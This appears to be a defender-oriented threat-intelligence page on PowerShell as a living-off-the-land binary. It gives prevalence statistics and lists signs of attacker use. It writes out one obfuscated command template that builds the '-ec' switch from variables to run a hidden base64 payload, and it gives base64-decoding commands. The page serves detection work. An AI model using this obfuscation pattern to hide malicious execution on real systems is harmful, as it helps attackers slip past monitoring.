Source: Wild
Threat: LOLBin
Powershell is a Windows native command line interpreter. It is very commonly executed across most environments and a popular tool for both administrators as well as attackers.
EchoTrail Prevalence Score (EPS)
Rank Analysis
Host Prevalence
Execution Rank
Behavioral Analysis
Top Filenames
Top Paths
98.99 %
Top Network Ports
47.88 %
Ancestry Analysis
Top GrandParents
Top Parents
Top Children
Security Analysis
Powershell.exe is one of the most commonly used utilities built into Windows. Its uses are too numerous to capture here. With powershell behavior it can be difficult to distinguish between admin and attacker behavior. Attackers often use this tool because it is so powerful, but also because it is so common. Some of the indicators of attacker use are command line switches like –enc or HiddenWindow. While these are also used in legitimate cases, they are of typically of sufficient interest to look deeper at the surrounding context of powershell's use. Powershell Obfuscation: e.g: powershell -window hidden -C "set-variable -name "LB" -value "-"; set-variable -name "I" -value "e"; set-variable -name "V" -value "c"; set-variable -name "wP" -value ((get-variable LB).value.toString()+(get-variable I).value.toString()+(get-variable V).value.toString()) ; powershell (get-variable wP).value.toString() <base64_string> Powershell Execution Policy Bypass Techniques Powershell alternatives to the traditional host info e.g. whoami: Base64 Decode To decode a base64 string on Mac: echo [base64string without brackets] | base64 –D To decode a base64 string on Windows: echo [base64string without brackets] > encoded.txt certutil -decode encoded.txt decoded.txt type decoded.txt Decode base64 in Powershell: PS > [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("encoded stuff goes here "))